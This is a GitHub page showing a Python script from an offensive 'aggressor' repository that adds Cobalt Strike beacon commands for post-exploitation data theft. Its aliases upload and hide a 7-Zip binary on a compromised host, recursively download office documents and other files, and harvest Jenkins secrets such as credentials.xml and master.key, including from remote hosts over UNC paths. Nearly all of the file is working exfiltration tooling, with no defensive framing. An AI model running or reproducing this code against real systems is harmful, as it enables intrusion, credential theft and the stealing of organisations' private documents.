aggressor/exfil.py at master · dcsync/aggressor · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
#!/usr/bin/env python3

import sys
import utils
sys.path.insert(0, utils.basedir('pycobalt'))

import os
import re
import textwrap
import datetime
import collections

import pycobalt.engine as engine
import pycobalt.events as events
import pycobalt.commands as commands
import pycobalt.aliases as aliases
import pycobalt.aggressor as aggressor
import pycobalt.callbacks as callbacks
import pycobalt.helpers as helpers
from pycobalt.helpers import powershell_quote

_uploaded = None

@aliases.alias('7z-init', 'Upload 7zip')
def _(bid):
    global _uploaded

    temp = helpers.guess_temp(bid)
    dest = r'{}\7za.exe'.format(temp)
    helpers.upload_to(bid, utils.basedir('tools/7za.exe'), dest)
    helpers.explorer_stomp(bid, '7za.exe')
    _uploaded = dest

@aliases.alias('7z', 'Run 7zip')
def _(bid, *args):
    global _uploaded

    if not _uploaded:
        aggressor.berror('Run 7z-init first')
        return

    line = ' '.join(args)
    aggressor.btask(bid, 'Tasked beacon to run 7zip command: {}'.format(line))
    aggressor.bpowerpick(bid, "echo '7zip starting'; {} {} ; echo '7zip finished';".format(_uploaded, line), silent=True)

@aliases.alias('7z-stop', 'Remove 7zip')
def _(bid):
    global _uploaded

    if not _uploaded:
        aggressor.berror('Run 7z-init first')
        return

    aggressor.brm(bid, _uploaded)
    _uploaded = None

@aliases.alias('grab-docs', 'Grab common documents')
def _(bid, directory, *extensions):

    if not extensions:
        extensions = ['doc', 'docx', 'docm',
                      'xls', 'xlsx', 'xlsm',
                      'ppt', 'pptx', 'pub',
                      'pdf', 'rtf', 'vsd',
                      'txt']

    def callback(path):
        ext = path.split('.')[-1]
        if ext in extensions:
            aggressor.bdownload(bid, path)

    aggressor.btask(bid, 'Tasked beacon to recursively download files with extensions: ' + ', '.join(extensions))
    helpers.recurse_ls(bid, directory, callback)

@aliases.alias('dlr', 'Recursively download files in directories')
def _(bid, *directories):
    def callback(path):
        aggressor.bdownload(bid, path)

    for directory in directories:
        aggressor.btask(bid, 'Tasked beacon to recurse {} for files to download'.format(directory))
        helpers.recurse_ls(bid, directory, callback)

@aliases.alias('dl', 'Download files')
def _(bid, *files):
    for fname in files:
        aggressor.bdownload(bid, fname)

@aliases.alias('dli', 'Download specific files in directory')
def _(bid, directory, *files):
    for fname in files:
        full = r'{}\{}'.format(directory, fname)
        aggressor.bdownload(bid, full)

@aliases.alias('dla', 'Non-recursively download files in directories')
def _(bid, *directories):
    def callback(path):
        aggressor.bdownload(bid, path)

    for directory in directories:
        aggressor.btask(bid, 'Tasked beacon to look in {} for files to download'.format(directory))
        helpers.recurse_ls(bid, directory, callback, depth=1)

@aliases.alias('grab-jenkins', 'Grab Jenkins files')
def _(bid, host=None):
    jenkins_dir = r'C:\program files (x86)\jenkins'
    files = ['secret.key', 'queue.xml', 'config.xml', 'jenkins.xml',
            'github-plugin-configuration.xml',
            'credentials.xml',
            'scriptApproval.xml', 'scm-sync-configuration.xml',
            'secrets/master.key', 'secrets/hudson.util.Secret']

    if host:
        prefix = helpers.path_to_unc(host, jenkins_dir)

    aggressor.btask(bid, 'Tasked beacon to download files in {}: {}'.format(prefix, ', '.join(files)))
    for fname in files:
        path = r'{}\{}'.format(prefix, fname)
        aggressor.bdownload(bid, path, silent=True)

# Get download lpaths
@commands.command('lpaths')
def _(out=None):
    downloads = aggressor.downloads()

    lines = []
    for download in downloads:
        lpath = download['lpath']
        path = r'{}{}'.format(download['path'], download['name'])

        lines.append('{}\t{}'.format(path, lpath))

    if out:
        with open(out, 'w+') as fp:
            fp.writelines(lines)
    else:
        for line in lines:
            aggressor.println(line)